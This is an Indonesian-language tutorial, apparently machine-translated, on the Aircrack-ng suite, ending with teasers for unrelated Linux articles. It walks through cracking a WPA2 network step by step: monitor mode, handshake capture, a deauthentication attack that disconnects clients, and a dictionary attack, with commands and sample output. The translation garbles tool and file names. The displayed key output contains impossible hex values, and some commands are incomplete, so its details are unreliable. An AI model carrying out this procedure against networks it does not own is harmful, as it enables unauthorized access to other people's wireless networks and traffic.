retakan udara

Cara Menggunakan Aircrack-ng

Cara Menggunakan Aircrack-ng
Sebagian besar waktu, orang tidak pernah memikirkan jaringan yang terhubung dengan mereka. Mereka tidak pernah berpikir seberapa aman jaringan itu dan seberapa besar mereka mempertaruhkan data rahasia mereka setiap hari. Anda dapat menjalankan pemeriksaan kerentanan di jaringan wifi Anda dengan menggunakan alat yang sangat kuat yang disebut Aircrack-ng dan Wireshark. Wireshark digunakan untuk memantau aktivitas jaringan. Aircrack-ng lebih seperti alat agresif yang memungkinkan Anda meretas dan memberikan akses ke koneksi Nirkabel. Berpikir sebagai penyusup selalu menjadi cara teraman untuk melindungi diri Anda dari peretasan. Anda mungkin dapat memahami tindakan tepat yang akan dilakukan penyusup untuk mendapatkan akses ke sistem Anda dengan mempelajari tentang aircrack. Anda kemudian dapat melakukan pemeriksaan kepatuhan pada sistem Anda sendiri untuk memastikan bahwa itu tidak tidak aman.

Aircrack-ng adalah perangkat lunak lengkap yang dirancang untuk menguji keamanan jaringan WiFi network. Ini bukan hanya satu alat tetapi kumpulan alat, yang masing-masing melakukan tujuan tertentu. Berbagai area keamanan wifi dapat dikerjakan, seperti memantau Access Point, menguji, menyerang jaringan, meretas jaringan wifi, dan mengujinya. Tujuan utama Aircrack adalah untuk mencegat paket dan menguraikan hash untuk memecahkan kata sandi. Ini mendukung hampir semua antarmuka nirkabel baru. Aircrack-ng adalah versi perbaikan dari suite alat Aircrack yang sudah ketinggalan zaman, ng mengacu pada Generasi baru. Beberapa alat luar biasa yang bekerja sama dalam menyelesaikan tugas yang lebih besar.

Airmon-ng:

Airmon-ng disertakan dalam kit aircrack-ng yang menempatkan kartu antarmuka jaringan dalam mode monitor. Kartu jaringan biasanya hanya akan menerima paket yang ditargetkan untuk mereka seperti yang ditentukan oleh alamat MAC NIC, tetapi dengan airmon-ng, semua paket nirkabel, apakah mereka ditargetkan untuk mereka atau tidak, akan diterima juga. Anda seharusnya dapat menangkap paket-paket ini tanpa menghubungkan atau mengautentikasi dengan titik akses. Ini digunakan untuk memeriksa status Titik Akses dengan menempatkan antarmuka jaringan dalam mode monitor. Pertama, kita harus mengonfigurasi kartu nirkabel untuk mengaktifkan mode monitor, kemudian mematikan semua proses latar belakang jika menurut Anda ada proses yang mengganggunya. Setelah menghentikan proses, mode monitor dapat diaktifkan pada antarmuka nirkabel dengan menjalankan perintah di bawah ini:

[dilindungi email]:~$ sudo airmon-ng start wlan0 #

Anda juga dapat menonaktifkan mode monitor dengan menghentikan airmon-ng kapan saja dengan menggunakan perintah di bawah ini:

[dilindungi email]:~$ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng digunakan untuk membuat daftar semua jaringan di sekitar kita dan untuk melihat informasi berharga tentang mereka. Fungsi dasar airodump-ng adalah untuk mengendus paket, jadi pada dasarnya diprogram untuk mengambil semua paket di sekitar kita saat berada dalam mode monitor. Kami akan menjalankannya terhadap semua koneksi di sekitar kami dan mengumpulkan data seperti jumlah klien yang terhubung ke jaringan, alamat mac mereka yang sesuai, gaya enkripsi, dan nama saluran dan kemudian mulai menargetkan jaringan target kami.

Dengan mengetikkan perintah airodump-ng dan memberinya nama antarmuka jaringan sebagai parameter, kita dapat mengaktifkan alat ini. Ini akan mencantumkan semua titik akses, jumlah paket data, metode enkripsi dan otentikasi yang digunakan, dan nama jaringan (ESSID). Dari sudut pandang peretasan, alamat mac adalah bidang yang paling penting.

[dilindungi email]:~$ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack digunakan untuk cracking kata sandi. Setelah menangkap semua paket menggunakan airodump, kami dapat memecahkan kuncinya dengan aircrack. Itu memecahkan kunci ini menggunakan dua metode PTW dan FMS. Pendekatan PTW dilakukan dalam dua tahap. Pada awalnya, hanya paket ARP yang digunakan, dan hanya kemudian, jika kunci tidak di-crack setelah pencarian, ia menggunakan semua paket yang ditangkap lainnya. Poin plus dari pendekatan PTW adalah tidak semua paket digunakan untuk cracking. Dalam pendekatan kedua, i.e., FMS, kami menggunakan model statistik dan algo brute force untuk memecahkan kunci. Metode kamus juga dapat digunakan.

Aireplay-ng:

Airplay-ng memperkenalkan paket ke jaringan nirkabel untuk membuat atau mempercepat lalu lintas. Paket dari dua sumber berbeda dapat ditangkap oleh aireplay-ng. Yang pertama adalah jaringan langsung, dan yang kedua adalah paket dari file pcap yang sudah ada. Airplay-ng berguna selama serangan deauthentication yang menargetkan titik akses nirkabel dan pengguna. Selain itu, Anda dapat melakukan beberapa serangan seperti serangan kopi latte dengan airplay-ng, alat yang memungkinkan Anda untuk mendapatkan kunci dari sistem klien.  Anda dapat mencapai ini dengan menangkap paket ARP dan kemudian memanipulasinya dan mengirimkannya kembali ke sistem. Klien kemudian akan membuat paket yang dapat ditangkap oleh airodump dan aircrack memecahkan kunci dari paket yang dimodifikasi itu. Beberapa opsi serangan lain dari airplay-ng termasuk chopchop, fragmen arepreplay, dll.

Pangkalan Udara:

Airbase-ng digunakan untuk mengubah komputer penyusup ke titik koneksi yang disusupi untuk ditautkan ke orang lain. Menggunakan Airbase-ng, Anda dapat mengklaim sebagai titik akses legal dan melakukan serangan man-in-the-middle pada komputer yang terhubung ke jaringan Anda. Serangan semacam ini disebut Serangan Kembar Jahat. Tidak mungkin bagi pengguna dasar untuk membedakan antara jalur akses legal dan jalur akses palsu. Jadi, ancaman kembaran jahat adalah salah satu ancaman nirkabel paling mengancam yang kita hadapi saat ini.

Airolib-ng:

Airolib mempercepat proses peretasan dengan menyimpan dan mengelola daftar kata sandi dan titik akses. Sistem manajemen basis data yang digunakan oleh program ini adalah SQLite3, yang sebagian besar tersedia di semua platform. Pembobolan kata sandi mencakup perhitungan kunci master berpasangan yang melaluinya kunci transien pribadi (PTK) diekstraksi. Menggunakan PTK, Anda dapat menentukan kode identifikasi pesan bingkai (MIC) untuk paket yang diberikan dan secara teoritis menemukan MIC serupa dengan paket, jadi jika PTK benar, PMK juga benar.

Untuk melihat daftar kata sandi dan mengakses jaringan yang disimpan dalam database, ketik perintah berikut:

[dilindungi email]:~$ sudo airolib-ng testdatabase -stats

Di sini testdatabase adalah db yang ingin Anda akses atau buat, dan -stats adalah operasi yang ingin Anda lakukan padanya. Anda dapat melakukan beberapa operasi pada bidang database, seperti memberikan prioritas maksimum untuk beberapa SSID atau sesuatu. Untuk menggunakan airolib-ng dengan aircrack-ng, masukkan perintah berikut:

[dilindungi email]:~$ sudo aircrack-ng  -r testdatabase wpa2.eapol.topi

Di sini kita menggunakan PMK yang sudah dihitung yang disimpan di testdatabase untuk mempercepat proses cracking password.

Cracking WPA/WPA2 menggunakan Aircrack-ng:

Mari kita lihat contoh kecil dari apa yang dapat dilakukan aircrack-ng dengan bantuan beberapa alatnya yang luar biasa.  Kami akan memecahkan kunci pra-berbagi jaringan WPA/WPA2 menggunakan metode kamus.

Hal pertama yang perlu kita lakukan adalah membuat daftar antarmuka jaringan yang mendukung mode monitor. Ini dapat dilakukan dengan menggunakan perintah berikut:

[dilindungi email]:~$ sudo airmon-ng
PHY    Antarmuka                  Driver         Chipset
Phy0   wlx0                       rtl8xxxu       Realtek Semiconductor Corp.

Kita bisa melihat sebuah antarmuka; sekarang, kita harus meletakkan antarmuka jaringan yang kita temukan ( wlx0 ) dalam mode monitor menggunakan perintah berikut:

[dilindungi email]:~$ sudo airmon-ng start wlx0

Ini telah mengaktifkan mode monitor pada antarmuka yang disebut wlx0mon.

Sekarang kita harus mulai mendengarkan siaran oleh router terdekat melalui antarmuka jaringan yang telah kita masukkan ke mode monitor.

[dilindungi email]:~$ sudo airodump-ng wlx0mon
CH  5 ][ Berlalu: 30 d ][ 2020-12-02 00:17
 
BSSID              PWR  Beacon    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
E4:6F:13:04:CE:31  -45       62       27    0   1  54e  WPA2 CCMP   PSK  CrackIt
C4:E9:84:76:10:BE  -63       77        0    0   6  54e. WPA2 CCMP   PSK  HAckme
C8:3A:35:A0:4E:01  -63       84        0    0   8  54e  WPA2 CCMP   PSK  Net07
74:DA:88:FA:38:02  -68       28        2    0  11  54e  WPA2 CCMP   PSK  TP-Link_3802
 
BSSID              STATION            PWR   Tingkat    Hilang    Frames  Probe
 
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B   -3    0 - 1e     8        5
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -33    1e- 6e     0        3
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -35    0 - 1      0        6
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -39    0e- 1   1002       13 

Jaringan target kami adalah Crackit dalam hal ini, yang sedang berjalan di saluran 1.

Di sini untuk memecahkan kata sandi jaringan target, kita perlu menangkap jabat tangan 4 arah, yang terjadi ketika perangkat mencoba terhubung ke jaringan. Kita dapat menangkapnya dengan menggunakan perintah berikut:

[dilindungi email]:~$ sudo airodump-ng -c 1 --bssid  E4:6F:13:04:CE:31 -w /home wlx0

-c         : Saluran

-bssid: Bssid dari jaringan target

-w        : Nama direktori tempat file pcap akan ditempatkan

Sekarang kita harus menunggu perangkat terhubung ke jaringan, tetapi ada cara yang lebih baik untuk menangkap jabat tangan. Kami dapat melakukan deauthentication perangkat ke AP menggunakan serangan deauthentication menggunakan perintah berikut:

[dilindungi email]:~$ sudo aireplay-ng -0 -a E4:6F:13:04:CE:31

Sebuah:    Bssid dari jaringan target

-0:   serangan deautentikasi

Kami telah memutuskan semua perangkat, dan sekarang kami harus menunggu perangkat terhubung ke jaringan.

CH  1 ][ Berlalu: 30 d ][ 02-12-2020 00:02 ][ Jabat tangan WPA: E4:6F:13:04:CE:31
 
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
 
E4:6F:13:04:CE:31  -47   1      228      807   36   1  54e  WPA2 CCMP   PSK  P
 
BSSID              STATION            PWR   Tingkat    Hilang    Frames  Probe
 
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -35    0 - 1      0        1
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B  -29    0e- 1e     0       22
E4:6F:13:04:CE:31  88:28:B3:30:27:7E  -31    0e- 1      0       32
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -35    0e- 6e   263      708  CrackIt
E4:6F:13:04:CE:31  D4:6A:6A:99:ED:E3  -35    0e- 0e     0       86
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -37    0 - 1e     0        1            

Kami mendapat pukulan, dan dengan melihat sudut kanan atas tepat di sebelah waktu, kami dapat melihat jabat tangan telah ditangkap. Sekarang lihat di folder yang ditentukan ( /rumah dalam kasus kami ) untuk “.pcap"berkas".

Untuk memecahkan kunci WPA, kita dapat menggunakan perintah berikut:

[dilindungi email]:~$ sudo aircrack-ng -a2 -w rockyou.txt -b  E4:6F:13:04:CE:31 jabat tangan.topi
b                          :Bssid dari jaringan target
-a2                      :mode WPA2
Menghibur Anda.txt:       File kamus yang digunakan
Jabat tangan.cap: File yang berisi jabat tangan yang ditangkap
Aircrack-ng 1.2 beta3
[00:01:49] 10566 kunci diuji (1017.96 k/s)
KUNCI DITEMUKAN! [ saya ketahuan ]
Kunci Master :   8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Kunci Sementara : 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC:  CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Kunci jaringan target kami telah berhasil dipecahkan cracked.

Kesimpulan:

Jaringan nirkabel ada di mana-mana, digunakan oleh setiap perusahaan, mulai dari pekerja yang menggunakan smartphone hingga perangkat kontrol industri. Menurut penelitian, hampir lebih dari 50 persen lalu lintas internet akan melalui WiFi pada tahun 2021.  Jaringan nirkabel memiliki banyak keuntungan, komunikasi di luar pintu, akses internet cepat di tempat-tempat yang hampir tidak mungkin untuk memasang kabel, dapat memperluas jaringan tanpa memasang kabel untuk pengguna lain, dan dapat dengan mudah menghubungkan perangkat seluler Anda ke kantor rumah saat Anda tidak tidak ada.

Terlepas dari kelebihan ini, ada tanda tanya besar tentang privasi dan keamanan Anda. Sebagai jaringan ini; dalam jangkauan transmisi router terbuka untuk semua orang, mereka dapat dengan mudah diserang, dan data Anda dapat dengan mudah dikompromikan. Misalnya, jika Anda terhubung ke beberapa wifi publik, siapa pun yang terhubung ke jaringan itu dapat dengan mudah memeriksa lalu lintas jaringan Anda menggunakan beberapa kecerdasan dan dengan bantuan alat luar biasa yang tersedia dan bahkan membuangnya.

Cara Mengembangkan Game di Linux
Satu dekade yang lalu, tidak banyak pengguna Linux yang memprediksi bahwa sistem operasi favorit mereka suatu hari nanti akan menjadi platform game po...
Port Sumber Terbuka dari Mesin Game Komersial
Rekreasi mesin game gratis, open source, dan lintas platform dapat digunakan untuk bermain lama serta beberapa judul game yang cukup baru. Artikel ini...
Game Baris Perintah Terbaik untuk Linux
Baris perintah bukan hanya sekutu terbesar Anda saat menggunakan Linux-ini juga dapat menjadi sumber hiburan karena Anda dapat menggunakannya untuk me...